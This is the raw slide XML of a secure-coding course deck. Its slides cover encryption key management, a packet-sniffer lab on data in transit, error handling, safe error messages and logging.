          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="190500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="47000"/>
              </a:prstClr>
            </a:outerShdw>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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manage Encryption Keys (Slide 4 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252453" y="1302040"/>
            <a:ext cx="7549621" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use only well-maintained, time-tested, and proven crypto libraries that have been tested and validated by reputable third-party organizations, such as NIST.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement a separation of duties.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different people should control different aspects of key management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates and manages keys—should not have access to resources they protect. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can access protected data—should not be able to manage encryption keys. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where encryption keys are in the clear, controls should require multiple people.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rotate encryption keys, and document key rollover and history.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9"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a:off x="285458" y="1916800"/>
            <a:ext cx="836776" cy="15383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protect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 y="1107644"/>
            <a:ext cx="1258275" cy="1415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checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD93E084-28DC-4A4C-9108-F6A3E0C62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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B6B8F7-48FB-4903-BC7D-23383FE396B1}"/>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55549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61</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You will test communication between a server and client developed in Python to determine whether the data they transfer across the network is secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will use a packet sniffer to capture data sent over the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since the packet sniffer must run with administrator access, you will launch PyCharm as an administrator.</a:t>
            </a:r>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Activity: Protecting Data in Transit and at Rest</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56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8FE8F6-47A5-4B99-8CFC-629357424319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</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531F4D0B-03A7-4CC6-A8F7-EF53B912FF4C}"/>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A098176B-3C1A-4C8E-A47B-3C1704698B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Error Handling and Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3543313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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three approaches to handling the possibility of runtime errors in code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Error prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Test for all conditions that might cause an error, and prevent them from occurring in the first place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Functional error checking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Check for errors where they occur within a function or as the result of a function call is returned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Structured exception handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Respond to error events that suspend the normal flow of execution, providing various routines for dealing with the different types of exceptions that might occur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of these approaches are valid and are used in different circumstances.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some programming languages do not provide an exception-handling facility, so you need to either create your own (which may be limited in the types of errors it enables you to handle), or use a different approach for error handling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some types of errors are implemented through an exception-handling facility because they can't be prevented, and they can occur at any time—such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disconnected device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Removed storage medium (e.g., disk or SD card)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sudden loss of a network connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error Handling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1506752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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error-handling serves multiple purposes during development and in deployed code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables the software to inform:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The developer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Can be told when they’ve used components incorrectly during development.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Other code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—One module can inform another module when a problem occurs outside its scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The end user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Can be told when a problem occurs and guided to take corrective steps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The system operator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Can be informed of problems through logs and notifications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The system itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Can be informed when runtime problems are so severe that a task or even the entire application must be abandoned immediately.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses for Error Handling (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287628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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To ensure there are no bad consequences, data may need to be restored to its original state, connections terminated, and pending transactions ended or reverted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure you provide appropriate error-handling to meet these needs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security problems may occur when errors are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not handled at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handled inappropriately:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Muddling transactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confusing users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enabling the system to pass into an unstable or unsafe state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses for Error Handling (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154605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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information you provide depends on who will be interacting with the code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User interface—Messaging should be directed to the end user, and should help the user understand the problem, and if applicable, help them correct it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backend services—Messaging should be directed to other developers, providing them with the information they need.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Messages may also be seen by an attacker. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be mindful to provide information needed by legitimate users and developers, but avoid providing information that might be useful to an attacker, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session identifiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Underlying database or file system structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Table names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error Messaging (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2176736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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In production:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable default handlers that show debugging or stack trace information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change configuration settings of compilers, web frameworks, cloud environments, and other platforms to disable detailed error messaging.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide error messages that are helpful for an end user, but not helpful for an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: If user fails login, you are not obligated to point out which part (user name or password) was incorrect.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error Messaging (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="787307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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging serves a number of purposes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Helps the developer figure out the cause of problems experienced by end users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides insight into the scope and cause of problems (security related or not). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables you to record possible security events that a system administrator can refer to as needed or actively monitor using a security information and event management (SIEM) system or intrusion detection system (IDS). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be mandated by legal and regulatory requirements. If you provide logging for this purpose, you should ensure that your logs are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auditable—All transactions that are tracked must be formally documented by the system, and those logs must be kept for the designated time period.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traceable—Logging must be able to show the transaction moving through all tiers of the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>High Integrity—You must be able to ensure that logs have not been overwritten or tampered with by local or remote users.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>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3233252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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Error Handling (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310327" y="1302039"/>
            <a:ext cx="7491747" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that errors fail safe (not open). In other words, deny access by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application should handle application errors and not rely on the server configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application should handle all security exceptions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Properly free allocated memory when error conditions occur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When writing functions that might fail, provide a clear means for calling functions to determine failure or success of the call. For example, return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> if the function succeeds, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> if it fails. Follow established programming idioms in the language you're using to return the result itself in a separate value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the event that a fatal error requires exiting the module or application, ensure that all affected values and ongoing transactions are restored to a secure state.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for error handl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550491" y="1938612"/>
            <a:ext cx="495478" cy="592679"/>
            <a:chOff x="341925" y="2514600"/>
            <a:chExt cx="764437" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="341925" y="25146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1925" y="27432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3400" y="27432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3400" y="29718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3887" y="29718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33887" y="32004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3400" y="32004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33400" y="34290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2" name="Picture 21" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D28E5E-C504-4441-AC82-A98582D3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92" y="5075476"/>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88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376D-5553-4D01-9215-AD9760AAB559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods for Passing Session IDs (Slide 3 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{503746AF-0ED3-4279-ACD5-8C95F2DD4F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454718CA-A77B-4BE6-A1C5-F120E31C5539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="1066800"/>
          <a:ext cx="8801784" cy="3450336"/>
        </p:xfrm>
        <a:graphic>
